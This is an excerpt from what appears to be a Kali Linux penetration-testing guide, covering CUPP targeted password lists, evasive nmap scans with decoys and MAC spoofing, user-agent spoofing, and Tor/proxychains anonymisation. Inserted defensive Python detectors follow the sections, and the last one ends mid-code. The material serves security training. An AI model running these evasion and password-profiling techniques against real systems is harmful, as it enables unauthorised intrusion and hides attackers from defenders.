[+] List of paths and servers found: 

Normal 
documentbase 
ASML.dot 
CEP_Template 
CEP_Template.dot 
Normal.dot 
'C:\Mis documentos\Articulo Gestion.doc' 
'C:\WINDOWS\TEMP\AutoRecovery_save of Articulo Gestion.asd' 



Profiling users for password lists 

So far, you have learned to use passive reconnaissance to collect names and 
biographical information for users of the target being tested; this is the same process 
used by hackers. The next step is to use this information to create password lists 
specific to the users and the target. 

Lists of commonly used passwords are available for download, and are stored locally 
on Kali in the /usr/share/wordlists directory. These lists reflect the choices of a 
large population of users, and it can be time consuming for an application to attempt 
to use each possible password before moving on to the next password in the queue. 

Fortunately, Common User Password Profiler (CUPP) allows the tester to generate 
a wordlist that is specific to a particular user. CUPP was present on Backtrack 5r3; 
however, it will have to be downloaded for use on Kali. To obtain CUPP, enter the 
following command: 

git clone https://github.com/Mebus/cupp.git 

This will download CUPP to the local directory. 

CUPP is a Python script, and can be simply invoked from the CUPP directory by 
entering the following command: 

root@kali:~# python cupp.py -i 
This will launch CUPP in the interactive mode, which prompts the user for specific 
elements of information to use in creating a wordlist. An example is shown in the 
following screenshot: 

root@kali:~/Desktop/cupp# python cupp.py -i 

[+] Insert the informations about the victim to make a dictionary 
[+] If you don't know all the info, just hit enter when asked! ;) 

> Name: Robb 
> Surname: Beggs 
> Nickname: rwbeggs 
> Birthdate (DDMMYYYY): 01011900 

> Wife's(husband's) name: Vixen 
> Wife's(husband's) nickname: Vix 
> Wife's(husband's) birthdate (DDMMYYYY): 02021902 

> Child's name: Demon 
> Child's nickname: Demon 
> Child's birthdate (DDMMYYYY): 03031920 

> Pet's name: Spot 
> Company name: Packt 

> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N] 
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary... 
[+] Sorting list and removing duplicates... 
[+] Saving dictionary to robb.txt, counting 1157 words. 
[+] Now load your pistolero with robb.txt and shoot! Good luck! 



When the interactive mode has completed creating the wordlist, it is placed in the 
CUPP directory. 
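The defensive counterpart of the profile CUPP asks for is a password check that rejects anything still built from those same details. The following is an added example (not code from the book or from CUPP); the profile is constructed data, and the leet mapping it reverses is a common one assumed here to match CUPP's defaults.

```python
"""Reject passwords built from the personal details CUPP turns into a wordlist.

Added example (not code from the book or from CUPP). The prompts above show
the raw material of a targeted wordlist: names, nicknames, birthdates, partner,
child, pet and company. This check looks for those same tokens in a candidate
password after undoing case, a common leet mapping and the trailing digits or
symbols users bolt on. The profile below is constructed sample data.
"""
import re

# Reverse of a common leet mapping (assumed here to match CUPP's defaults).
DELEET = str.maketrans({"4": "a", "1": "i", "3": "e", "7": "t",
                        "0": "o", "5": "s", "9": "g", "2": "z"})
MIN_WORD = 3  # ignore fragments too short to be meaningful


def normalised_forms(password):
    """Lower-cased forms with leet undone, with and without trailing digits/symbols."""
    stripped = re.sub(r"[^A-Za-z]+$", "", password)
    return {p.lower().translate(DELEET) for p in (password, stripped)}


def profile_tokens(profile):
    """Split a CUPP-style profile into word tokens and date tokens."""
    words, dates = set(), set()
    for key, value in profile.items():
        if not value:
            continue
        if key.endswith("birthdate"):  # DDMMYYYY, as CUPP asks for it
            day, month, year = value[:2], value[2:4], value[4:]
            dates.update({year, day + month, month + day,
                          day + month + year, year + month + day})
        else:
            words.update(w for w in re.findall(r"[a-z]+", value.lower())
                         if len(w) >= MIN_WORD)
    return words, dates


def profile_matches(password, profile):
    """Return the profile-derived tokens present in the password (empty list = OK)."""
    words, dates = profile_tokens(profile)
    forms = normalised_forms(password)
    digits = re.sub(r"\D", "", password)
    hits = [w for w in sorted(words) if any(w in f for f in forms)]
    hits += [d for d in sorted(dates) if d in digits]
    return hits


# Constructed profile in the shape of CUPP's interactive prompts; not a real person.
SAMPLE_PROFILE = {
    "name": "Robin", "surname": "Example", "nickname": "rexample",
    "birthdate": "01011990",
    "partner_name": "Alex", "partner_nickname": "Lex", "partner_birthdate": "02021992",
    "child_name": "Sam", "pet_name": "Rover", "company": "ExampleCorp",
}

if __name__ == "__main__":
    for candidate in ("R0v3r2013!", "Lex1992", "ExampleCorp#1", "correct horse battery staple"):
        print("%-30s -> %s" % (candidate, profile_matches(candidate, SAMPLE_PROFILE) or "OK"))
```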
Summary 

The first real step in the attack process or kill chain is to conduct reconnaissance to 
identify the target and potential attack routes. Passive reconnaissance assesses data 
that is publicly available. This is a stealthy assessment — the IP address or activities 
of the attacker are almost indistinguishable from normal access. Nevertheless, this 
information can be critical when conducting social engineering attacks, or facilitating 
other attack types. 

In the next chapter, we will assess the types of reconnaissance that are more active. 
Although these techniques produce more information, there is an increased risk of 
detection. Therefore, the emphasis will be on advanced stealth techniques. 
Active Reconnaissance and Vulnerability Scanning 



The objective of the reconnaissance phase is to gather as much information about the 
target as possible in order to facilitate the exploitation phase of the kill chain. 

We have seen how passive reconnaissance, which is almost undetectable, can yield 
a significant amount of information about the target organization and its users. 

Active reconnaissance builds on the results of open-source intelligence and passive 
reconnaissance, and focuses on using probes to identify the path to the target and 
the exposed attack surface of the target. In general, complex systems have a greater 
attack surface, and each surface may be exploited and then leveraged to support 
additional attacks. 

Although active reconnaissance produces more information, and more useful 
information, interactions with the target system may be logged, triggering alarms 
by protective devices, such as firewalls and intrusion detection systems. As the 
usefulness of the data to the attacker increases, so does the risk of detection; this 
is shown in the following diagram: 




[Diagram: as interaction with the target, and the chance of detection, increase, 
reconnaissance moves from OSINT and passive reconnaissance, through 
infrastructure, host detection and port scans, to operating system, services, 
application and patch-level detection] 




To improve the effectiveness of active reconnaissance in providing detailed 
information, our focus will be on using stealthy, or difficult to detect, techniques. 

In this chapter, you will learn: 

• Stealth scanning strategies 

• Network infrastructure, host discovery, and enumeration 

• Comprehensive reconnaissance applications, especially recon-ng 

• Targeted vulnerability scanning 

Stealth scanning strategies 

The greatest risk of active reconnaissance is discovery by the target. Using the 
tester's time and date stamps, the source IP address, and additional information, 
the target can identify the source of the incoming reconnaissance. Therefore, stealth 
techniques are employed to minimize the chances of detection. 

When employing stealth to support reconnaissance, a tester mimicking the actions of 
a hacker will do the following: 

• Camouflage tool signatures to avoid detection and triggering an alarm 

• Hide the attack within legitimate traffic 

• Modify the attack to hide the source and type of traffic 

• Make the attack invisible using nonstandard traffic types or encryption 

Stealth scanning techniques can include some or all of the following: 

• Adjusting source IP stack and tool identification settings 

• Modifying packet parameters (nmap) 

• Using proxies with anonymity networks (Proxy Chains and Tor network) 

Adjusting source IP stack and tool 
identification settings 

Before the penetration tester (or the attacker) begins testing, they must ensure that all 
unnecessary services on Kali are disabled or turned off. 
For example, if the local DHCP daemon is enabled and is not required, it is possible 
for the DHCP daemon to interact with the target system, which could be logged and send 
alarms to the target's administrators. 

Most testers also disable IPv6 from running on the testing system. This will stop IPv6 
from announcing your presence on the target network and ensure that all traffic is 
first routed through an IPv4 SOCKS proxy. Disabling IPv6 can be accomplished by 
editing the /etc/sysctl.conf file to include the following lines: 

#disable ipv6 
net.ipv6.conf.all.disable_ipv6 = 1 
net.ipv6.conf.default.disable_ipv6 = 1 
net.ipv6.conf.lo.disable_ipv6 = 1 

Some commercial and open source tools (for example, the Metasploit Framework) 
tag their packets with an identifying sequence. Although this can be useful in 
post-test analysis of a system's event logs (where events initiated by a particular 
testing tool can be directly compared to a system's event logs to determine how the 
network detected and responded to the attack), it can also trigger certain intrusion 
detection systems. Test your tools against a lab system to determine the packets that 
are tagged, and either change the tag, or use the tool with caution. 

The easiest way to identify tagging is to apply the tool against a newly-created 
virtual image as the target, and review system logs for the tool's name. In addition, 
use Wireshark to capture traffic between the attacker and target virtual machines, 
and then search the packet capture (pcap) files for any keywords that can be 
attributed to the testing tool (name of the tool, vendor, license number, and so on). 

The UserAgent in the Metasploit Framework can be changed by modifying the 
http_form_field option. From the msfconsole prompt, select the option to use 
auxiliary/fuzzers/http/http_form_field, and then set a new useragent, as 
shown in the following screenshot: 

msf > use auxiliary/fuzzers/http/http_form_field 
msf auxiliary(http_form_field) > set UserAgent 
UserAgent => Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 
msf auxiliary(http_form_field) > set UserAgent Googlebot/2.1 (+http://www.google.com/bot.html) 
UserAgent => Googlebot/2.1 (+http://www.google.com/bot.html) 
msf auxiliary(http_form_field) > _ 

In this example, UserAgent was set to be Google's indexing spider, the Googlebot. 
This is a common automated application that visits and indexes websites, and rarely 
attracts attention by the website's owner. 

To identify legitimate UserAgents, refer to the examples at 
www.useragentstring.com. 
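A Googlebot User-Agent only passes unnoticed where nobody checks it. The following is an added example (not code from the book or from Metasploit) of the verification Google documents for its crawler: reverse DNS of the source address into googlebot.com or google.com, confirmed by a forward lookup of that name. The log lines and DNS answers are constructed, using documentation address ranges, so the triage runs offline.

```python
"""Tell a genuine Googlebot visit from a request that merely wears its User-Agent.

Added example (not code from the book or from Metasploit). The check Google
documents for its crawler is a reverse DNS lookup of the source address that
must end in googlebot.com or google.com, confirmed by a forward lookup of that
name returning the same address. DNS answers are supplied by lookup functions:
the constructed tables below let the triage run offline, while system_reverse
and system_forward are drop-in replacements that query real DNS.
"""
import re
import socket

GOOGLEBOT_UA = re.compile(r"\bGooglebot\b")
TRUSTED_SUFFIXES = (".googlebot.com", ".google.com")
# Combined log format: client address first, User-Agent as the last quoted field.
LOG_LINE = re.compile(r'^(?P<ip>\S+) .*"(?P<ua>[^"]*)"\s*$')


def verify_crawler(ip, user_agent, reverse_lookup, forward_lookup):
    """Return a dict with claims_googlebot, verified and the reason for the verdict."""
    verdict = {"claims_googlebot": bool(GOOGLEBOT_UA.search(user_agent)),
               "verified": False, "reason": "no Googlebot claim"}
    if not verdict["claims_googlebot"]:
        return verdict
    host = reverse_lookup(ip)
    if not host:
        verdict["reason"] = "no PTR record for %s" % ip
        return verdict
    host = host.rstrip(".").lower()
    if not host.endswith(TRUSTED_SUFFIXES):
        verdict["reason"] = "PTR %s is outside Google's crawler domains" % host
        return verdict
    if ip not in forward_lookup(host):
        verdict["reason"] = "forward lookup of %s does not return %s" % (host, ip)
        return verdict
    verdict["verified"] = True
    verdict["reason"] = "PTR %s confirmed by forward lookup" % host
    return verdict


def triage_log(lines, reverse_lookup, forward_lookup):
    """Map each client address in the log to its crawler verdict."""
    verdicts = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if m and m["ip"] not in verdicts:
            verdicts[m["ip"]] = verify_crawler(m["ip"], m["ua"], reverse_lookup, forward_lookup)
    return verdicts


def system_reverse(ip):
    """Live PTR lookup (not used by the offline sample)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """Live address lookup (not used by the offline sample)."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except OSError:
        return set()


# Constructed DNS data and log lines (documentation address ranges, not real hosts).
SAMPLE_PTR = {"203.0.113.10": "crawl-203-0-113-10.googlebot.com.",
              "198.51.100.7": "scanner.example.net.",
              "192.0.2.9": "crawl-192-0-2-9.googlebot.com."}  # PTR chosen by the IP's owner
SAMPLE_A = {"crawl-203-0-113-10.googlebot.com": {"203.0.113.10"},
            "scanner.example.net": {"198.51.100.7"}}  # no forward record for 192.0.2.9's PTR
UA = "Googlebot/2.1 (+http://www.google.com/bot.html)"
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Mar/2014:15:48:26 +0000] "GET /robots.txt HTTP/1.1" 200 143 "-" "%s"' % UA,
    '198.51.100.7 - - [10/Mar/2014:15:48:27 +0000] "GET /login HTTP/1.1" 200 512 "-" "%s"' % UA,
    '192.0.2.9 - - [10/Mar/2014:15:48:28 +0000] "GET /admin HTTP/1.1" 404 207 "-" "%s"' % UA,
    '198.51.100.20 - - [10/Mar/2014:15:48:29 +0000] "GET / HTTP/1.1" 200 3041 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def sample_reverse(ip):
    return SAMPLE_PTR.get(ip)


def sample_forward(host):
    return SAMPLE_A.get(host, set())


if __name__ == "__main__":
    for ip, v in triage_log(SAMPLE_LOG, sample_reverse, sample_forward).items():
        print(ip, "VERIFIED" if v["verified"] else "UNVERIFIED", "-", v["reason"])
```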
Modifying packet parameters 

The most common approach to active reconnaissance is to conduct a scan against the 
target: send defined packets to the target, and then use the returned packets to gain 
information. The most popular tool of this type is Network Mapper (nmap). 

To use nmap effectively, it must be run with root-level privileges. This is typical of 
applications that manipulate packets, which is why Kali defaults to root at the time 
of startup. 

When attempting to minimize detection, some stealth techniques to avoid detection 
and subsequent alarms include the following: 

• Identify the goal of the scan before testing and send the minimum number 
of packets needed to determine the objective. For example, if you wish to 
confirm the presence of a web host, you first need to determine if port 80, 
the default port for web-based services, is open. 

• Avoid scans that may connect with the target system and leak data. Do not 
ping the target or use synchronize (SYN) and nonconventional packet scans, 
such as acknowledge (ACK), finished (FIN), and reset (RST) packets. 

• Randomize or spoof packet settings, such as the source IP and port address, 
and the MAC address. 

• Adjust the timing to slow the arrival of packets at the target site. 

• Change the packet size by fragmenting packets or appending random data to 
confuse packet inspection devices. 

For example, if you want to conduct a stealthy scan and minimize detection, the 
following nmap command could be used: 

# nmap --spoof-mac Cisco --data-length 24 -T paranoid --max-hostgroup 1 
--max-parallelism 10 -PN -f -D 10.1.20.5,RND:5,ME -v -n -sS -sV 
-oA /desktop/pentest/nmap/out -p T:1-1024 --random-hosts 10.1.1.10 10.1.1.15 

The following table explains the previous command in detail: 

Command                    Rationale 
--spoof-mac Cisco          Spoofs the MAC address to match a Cisco product. 
                           Replacing Cisco with 0 will create a completely 
                           random MAC address. 
--data-length 24           Appends twenty-four random bytes to most packets 
                           that are sent. 
-T paranoid                Sets the timing to the slowest setting, paranoid. 
--max-hostgroup            Limits the hosts that are scanned at a time. 
--max-parallelism          Limits the number of outstanding probes that are 
                           sent out. You can also use the --scan-delay 
                           option to set a pause between the probes; however, 
                           this option is not compatible with the 
                           --max-parallelism option. 
-PN                        Does not ping to identify active systems 
                           (this can leak data). 
-f                         Fragments the packets; this will frequently fool 
                           low-end and improperly configured IDS. 
-D 10.1.20.5,RND:5,ME      Creates decoy scans to run simultaneously with the 
                           attacker's scans; hides the actual attack. 
-n                         No DNS resolution; internal or external DNS 
                           servers are not actively queried by nmap for DNS 
                           information. Such queries are frequently logged, so 
                           the query function should be disabled. 
-sS                        Conducts a stealth TCP SYN scan, which does not 
                           complete the TCP handshake. Other scan types 
                           (for example, Null scans) can also be used; however, 
                           most of these will trigger detection devices. 
-sV                        Enables version detection. 
-oA /desktop/pentest/nmap  Outputs the results to all formats (normal, greppable, 
                           and XML). 
-p T:1-1024                Specifies the TCP ports to be scanned. 
--random-hosts             Randomizes the target host order. 



Together, these options will create a very slow scan that hides the true identity of 
the source. However, if the packets are too unusual, complex modification may 
actually attract the attention of the target; therefore, many testers and attackers use 
anonymity networks to minimize detection. 
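From the defender's side, the shaping in the table above is aimed at rate thresholds and single-source attribution, and two signals survive it: one source touching many distinct ports over a long window, and several sources whose probes to the same host:port land in the same second, which is what a decoy group looks like in a firewall log. The following is an added example (not code from the book or from nmap) that counts both over constructed, simplified iptables-style drop lines.

```python
"""Surface low-and-slow SYN scans and decoy groups in firewall drop logs.

Added example (not code from the book or from nmap). -T paranoid spaces probes
minutes apart to stay under per-source rate limits, and -D spreads the same
probes over decoy sources. Two signals survive that shaping and are counted
here: one source touching many distinct ports on a host within a long window,
and several sources whose SYNs to the same host:port arrive in the same
second. The log lines are constructed in a simplified iptables-like format.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LINE = re.compile(r"^(?P<ts>\S+) DROP SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
                  r"PROTO=TCP DPT=(?P<dpt>\d+) SYN(?P<frag> FRAG)?$")


def parse(lines):
    """Turn matching log lines into event dicts; unrelated lines are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"),
                           "src": m["src"], "dst": m["dst"],
                           "dpt": int(m["dpt"]), "frag": m["frag"] is not None})
    return events


def slow_scanners(events, window=timedelta(hours=6), min_ports=8):
    """(src, dst) pairs that touched >= min_ports distinct ports within any window."""
    by_pair = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_pair[(e["src"], e["dst"])].append(e)
    flagged = {}
    for pair, evs in by_pair.items():
        start = 0
        for end in range(len(evs)):  # sliding window over time-sorted probes
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = {e["dpt"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                flagged[pair] = max(flagged.get(pair, 0), len(ports))
    return flagged


def decoy_groups(events, min_sources=3):
    """Sets of sources whose SYNs to one host:port arrived in the same second."""
    bucket = defaultdict(set)
    for e in events:
        bucket[(e["dst"], e["dpt"], e["ts"])].add(e["src"])
    return {frozenset(srcs) for srcs in bucket.values() if len(srcs) >= min_sources}


def fragmenting_sources(events):
    """Sources that sent fragmented SYNs, another marker of a shaped scan."""
    return {e["src"] for e in events if e["frag"]}


def _line(ts, src, dst, dpt, frag=False):
    return "%s DROP SRC=%s DST=%s PROTO=TCP DPT=%d SYN%s" % (
        ts.strftime("%Y-%m-%dT%H:%M:%S"), src, dst, dpt, " FRAG" if frag else "")


# Constructed sample log (documentation address ranges, not real traffic).
T0 = datetime(2014, 3, 10, 1, 0, 0)
SAMPLE_LOG = (
    # one source, ten ports, one fragmented probe every five minutes: under any rate limit
    [_line(T0 + timedelta(minutes=5 * i), "198.51.100.5", "10.1.1.10", p, frag=True)
     for i, p in enumerate([21, 22, 23, 25, 53, 80, 110, 143, 443, 445])]
    # four sources hitting the same host:port in the same second, for two ports
    + [_line(T0 + timedelta(hours=1, minutes=5 * j), s, "10.1.1.15", p)
       for j, p in enumerate([80, 443])
       for s in ("203.0.113.1", "203.0.113.2", "203.0.113.3", "203.0.113.9")]
    # one benign connection attempt
    + [_line(T0 + timedelta(hours=2), "192.0.2.77", "10.1.1.10", 443)]
)

if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("slow scanners:", slow_scanners(ev))
    print("decoy groups:", [sorted(g) for g in decoy_groups(ev)])
    print("fragmenting:", fragmenting_sources(ev))
```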

Using proxies with anonymity networks 
(Tor and Privoxy) 

Tor (www.torproject.org) is an open source implementation of the third 
generation onion routing that provides free access to an anonymous proxy network. 
Onion routing enables online anonymity by encrypting user traffic and then 
transmitting it through a series of onion routers. At each router, a layer of encryption 
is removed to obtain routing information, and the message is then transmitted to the 
next node. It has been likened to the process of gradually peeling an onion, hence 
the name. It protects against traffic analysis attacks by guarding the source and 
destination of a user's IP traffic. 
In this example, Tor will be used with Privoxy, a noncaching web proxy that sits in 
the middle of an application that communicates with the Internet, and uses advanced 
filtering to ensure privacy and remove ads and potentially hostile data being sent to 
the tester. 

To install Tor, perform the following steps: 

1. Issue the apt-get update and apt-get upgrade commands, and then use 
the following command: 

apt-get install tor 

2. Once Tor is installed, edit the proxychains.conf file located in the 
/etc directory. 

This file dictates the number and order of proxies that the test system will 
use on the way to the Tor network. Proxy servers may be down, or they 
may be experiencing a heavy load (causing slow or latent connections); if 
this occurs, a defined or strict proxychain will fail because an expected link 
is missing. Therefore, disable the use of strict_chain and enable 
dynamic_chain, which ensures that the connection will be routed, as 
shown in the following screenshot: 

# proxychains.conf  VER 3.1 
# 
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS. 
# 

# The option below identifies how the ProxyList is treated. 
# only one option should be uncommented at time, 
# otherwise the last appearing option will be accepted 
# 
dynamic_chain 
# 
# Dynamic - Each connection will be done via chained proxies 
# all proxies chained in the order as they appear in the list 
# at least one proxy must be online to play in chain 
# (dead proxies are skipped) 
# otherwise EINTR is returned to the app 
# 
#strict_chain 
# 
# Strict - Each connection will be done via chained proxies 
# all proxies chained in the order as they appear in the list 
# all proxies must be online to play in chain 
# otherwise EINTR is returned to the app 
3. Next, edit the [ProxyList] section to ensure that the socks5 proxy is 
present, as shown in the following screenshot: 

[ProxyList] 
# add proxy here ... 
# meanwile 
# defaults set to "tor" 
socks4 127.0.0.1 9050 
socks5 127.0.0.1 9050 

Open proxies can be easily found online and added to the proxychains 
file. Testers can take advantage of this to further obfuscate their identity. 
For example, if there are reports that a certain country or block of IP 
addresses has been responsible for recent online attacks, look for open 
proxies from that location and add them to your list, or a separate 
configuration file. 

4. To start the Tor service from a terminal window, enter the 
following command: 

root@kali:~# service tor start 

5. Verify that Tor has started by using the following command: 
root@kali:~# service tor status 

6. It is important to verify that the Tor network is working and providing 
anonymous connectivity. Verify your source IP address first. From a 
terminal, enter the following command: 

root@kali:~# iceweasel www.whatismyip.com 

This will start the Iceweasel browser and open it to a site that provides the 
source IP address connected with that web page. Note the IP address, and 
then invoke Tor routing using the following proxychains command: 

root@kali:~# proxychains iceweasel www.whatismyip.com 
In this particular instance, the IP address was identified as 96.47.226.60. A whois 
lookup of that IP address from a terminal window indicates that the transmission is 
now exiting from a Tor exit node, as shown in the following screenshot: 

NetRange:       96.47.226.16 - 96.47.226.23 
CIDR:           96.47.226.16/29 
OriginAS:       
NetName:        TOR-MIA01 
NetHandle:      NET-96-47-226-16-1 
Parent:         NET-96-47-224-0-1 
NetType:        Reallocated 
Comment:        This is a Tor Exit Node operated on behalf of the Tor 
Comment:        Project. Tor helps you defend against network 
Comment:        surveillance that threatens personal freedom and 
Comment:        privacy. You can learn more now at www.torproject.org 



You can also verify that Tor is functioning properly by accessing 
https://check.torproject.org. 

Although communications are now protected using the Tor network, a DNS leak is 
still possible; this occurs when your system makes a DNS request outside the Tor 
tunnel, revealing your identity to your ISP. You can check for DNS leaks at 
www.dnsleaktest.com. 

When you test for a DNS leak, Kali's configuration of proxychains responds with a 
default source IP address of a Level 3 Communications server located in the United 
States, as shown in the following screenshot. This provides additional protection for 
the tester's identity. 

Your DNS test results 

This page shows the DNS servers that your computer is using to resolve DNS names. 
The owners of the servers listed below have the ability to log the names of all 
websites you connect to. 

WARNING: If you are connected to a VPN service and ANY of the servers listed below 
are not provided by the VPN service then your DNS maybe leaking. (You should be able 
to recognise them based on the hostname, ISP and location). This is not an issue if 
you trust the owners of these servers with your private data. 

We detected the 2 DNS servers listed below. 

IP                Hostname          ISP                     Country 
192.221.144.192   192.221.144.192   Level 3 Communications  United States 
192.221.144.109   192.221.144.109   Level 3 Communications  United States 
Most command lines can be run from the console using proxychains to access the 
Tor network. 

When using Tor, some considerations to be kept in mind are as follows: 

• Tor provides an anonymizing service, but it does not guarantee privacy. 
Owners of the exit nodes are able to sniff traffic, and reportedly may be able 
to access user credentials. 

• Vulnerabilities in the Tor Browser Bundle have reportedly been used by law 
enforcement to exploit systems and gain user information. 

• ProxyChains does not handle UDP traffic. 

• Some applications and services cannot run over this environment — in 
particular, Metasploit and nmap may break. The stealth SYN scan of nmap 
breaks out of proxychains and the connect scan is invoked instead; this can 
leak information to the target. 

• Some browser applications (ActiveX, Adobe's PDF applications, Flash, Java, 
RealPlay, and QuickTime) can be used to obtain your IP address. 

• Ensure that you clear and block cookies before browsing. 

The Tor-Buddy script allows you to control how frequently the Tor IP 
address is refreshed, automatically making it more difficult to identify 
the user's information (http://sourceforge.net/projects/linuxscripts/files/Tor-Buddy/). 



Identifying the network infrastructure 

Once the tester's identity is protected, identifying the devices on the Internet- 
accessible portion of the network is the next critical first step in scanning a network. 

Attackers and penetration testers use this information to do the following: 

• Identify devices that may confuse (load balancers) or eliminate 
(firewalls and packet inspection devices) test results 

• Identify devices with known vulnerabilities 

• Identify the requirement for continuing to implement stealthy scans 

• Gain an understanding of the target's focus on secure architecture and 
on security in general 
traceroute provides basic information on packet filtering abilities; some other 
applications on Kali include the following: 



Application   Description 
lbd           Uses two DNS- and HTTP-based techniques to detect load balancers 
              (shown in the following screenshot) 
miranda.py    Identifies universal plug-and-play (UPnP) devices 
nmap          Detects devices and determines the operating systems and their version 
SHODAN        Web-based search engine that identifies devices connected to 
              the Internet, including those with default passwords, known 
              misconfigurations, and vulnerabilities 



The following screenshot shows the results obtained on running the lbd script 
against Google; as you can see, Google uses both DNS-Loadbalancing as well 
as HTTP-Loadbalancing on its site. From a penetration tester's perspective, this 
information could be used to explain why spurious results are obtained, as the load 
balancer shifts a particular tool's activity from one server to another. 

Checking for DNS-Loadbalancing: FOUND 
www.google.ca has address 173.194.43.87 
www.google.ca has address 173.194.43.88 
www.google.ca has address 173.194.43.95 

Checking for HTTP-Loadbalancing [Server]: 
 GFE/2.0 
 gws 
 FOUND 

Checking for HTTP-Loadbalancing [Date]: 15:48:26, 15:48:27, 15:48:27, 15:48:27, 
15:48:28, 15:48:28, 15:48:29, 15:48:29, 15:48:29, 15:48:30, 15:48:31, 15:48:31, 
15:48:31, 15:48:32, 15:48:32, 15:48:32, 15:48:33, 15:48:36, NOT FOUND 

Checking for HTTP-Loadbalancing [Diff]: FOUND 
> Location: http://www.google.ca/?gfe_rd=ctrl&ei=4YEgU7LoBaGC8Qfq44G4Dg&gws_rd=cr 
< Location: http://www.google.ca/?gfe_rd=cr&ei=4IEgU9mrK8zY8geTHGgDw 
< Content-Length: 258 
< Server: GFE/2.0 
> P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info." 
> Server: gws 
> Content-Length: 274 
> X-XSS-Protection: 1; mode=block 
> X-Frame-Options: SAMEORIGIN 

www.google.ca does Load-balancing. Found via Methods: DNS HTTP[Server] HTTP[Diff] 
Enumerating hosts 

Host enumeration is the process of gaining specific particulars regarding a defined 
host. It is not enough to know that a server or wireless access point is present; 
instead, we need to expand the attack surface by identifying open ports, the base 
operating system, services that are running, and supporting applications. 

This is highly intrusive and unless care is taken, the active reconnaissance will be 
detected and logged by the target organization. 

Live host discovery 

The first step is to run network ping sweeps against a target address space and look 
for responses that indicate that a particular target is live and capable of responding. 
Historically, pinging referred to the use of ICMP; however, TCP, UDP, ICMP, and 
ARP traffic can also be used to identify live hosts. 

Various scanners can be run from remote locations across the Internet to identify live 
hosts. Although the primary scanner is nmap, Kali provides several other applications 
that are also useful, as shown in the following table: 



Application                        Description 
alive6 and detect-new-ip6          IPv6 host detection. detect-new-ip6 runs on a 
                                   scripted basis and identifies new IPv6 devices when 
                                   added. 
dnmap and nmap                     nmap is the standard network enumeration tool. 
                                   dnmap is a distributed client-server implementation 
                                   of the nmap scanner. 
PBNJ                               PBNJ stores nmap results in a database, and then 
                                   conducts historical analyses to identify new hosts. 
fping, hping2, hping3, and nping   Packet crafters that respond to targets in various 
                                   ways to identify live hosts. 



To the penetration tester or attacker, the data returned from live host discovery will 
identify the targets for attack. 
Run multiple host discovery scans while conducting a penetration test. 
Certain devices may be time dependent. During one penetration test, 
it was discovered that the system administrator set up a game server 
after regular business hours. Because it was not an approved business 
system, the administrator did not follow the normal process for securing 
the server; multiple vulnerable services were present, and it had not 
received necessary security patches. Testers were able to compromise the 
game server and gain access to the underlying corporate network using 
vulnerabilities in the administrator's game server. 



Port, operating system, and service discovery 

Kali provides several different tools useful for identifying open ports, operating 
systems, and installed services on remote hosts. The majority of these functions 
can be completed using nmap. Although we will focus on examples using nmap, 
the underlying principles apply to the other tools as well. 

Port scanning 

Port scanning is the process of connecting to TCP and UDP ports to determine what 
services and applications are running on the target device. There are 65,535 ports 
each for both TCP and UDP on each system. Some ports are known to be associated 
with particular services (TCP 20 and 21 are the usual ports for the file transfer 
protocol service (FTP)). The first 1,024 are the well-known ports, and most defined 
services run over ports in this range; accepted services and ports are maintained 
by IANA (http://www.iana.org/assignments/service-names-port-numbers/ 
service-names-port-numbers.xhtml). 

Although there are accepted ports for particular services, such as port 
80 for web-based traffic, services can be directed to use any port. This 
option is frequently used to hide particular services, particularly if 
the service is known to be vulnerable to attack. However, if attackers 
complete a port scan and do not find an expected service, or find it 
using an unusual port, they will be prompted to investigate further. 

The universal port mapping tool, nmap, relies on active stack fingerprinting. 
Specially crafted packets are sent to the target system, and the response of the OS 
to those packets allows nmap to identify the OS. In order for nmap to work, at least 
one listening port must be open, and the operating system must be known and 
fingerprinted, with a copy of that fingerprint in the local database. 
Using nmap for port discovery is very noisy — it will be detected and logged by 
network security devices. Some points to remember are as follows: 

• Attackers and penetration testers focused on stealth will test only the ports 
that impact the kill chain they are following to their specific target. If they 
are launching an attack that exploits vulnerabilities in a web server, they will 
search for targets with port 80 or port 8080 accessible. 

• Most port scanners have default lists of ports that are scanned — ensure that 
you know what is on that list and what has been omitted. Consider both TCP 
and UDP ports. 

• Successful scanning requires a deep knowledge of TCP/IP and related 
protocols, networking, and how particular tools work. For example, SCTP 
is an increasingly common protocol on networks, but it is rarely tested on 
corporate networks. 

• Port scanning, even when done slowly, can impact a network. Some older 
network equipment and equipment from specific vendors will lock when 
receiving or transmitting a port scan, thus turning a scan into a denial of 
service attack. 

• Tools used to scan a port, particularly nmap, are being extended with regard 
to functionality. They can also be used to detect vulnerabilities and exploit 
simple security holes. 
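The first point above (a port scan is noisy and gets logged) is worth seeing from the defender's side. The following added example, not from the book, is a small sweep detector of the kind a firewall or IDS applies: it counts the distinct (destination, protocol, port) targets each source touches inside a sliding time window. Two windows are checked, because a scan that is slowed down to stay under a short-window threshold still accumulates targets over an hour. The log lines are constructed in an iptables/syslog-like layout; the addresses are documentation ranges.

```python
"""Port-sweep detection over firewall log lines (added example, not the book's).

Each source's events are kept in a sliding window; the number of distinct
targets inside the window is the signal.  A short window catches a default
nmap run, a long window catches a deliberately slow scan.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# syslog-style timestamp, then the fields we need from an iptables LOG line
LINE_RE = re.compile(
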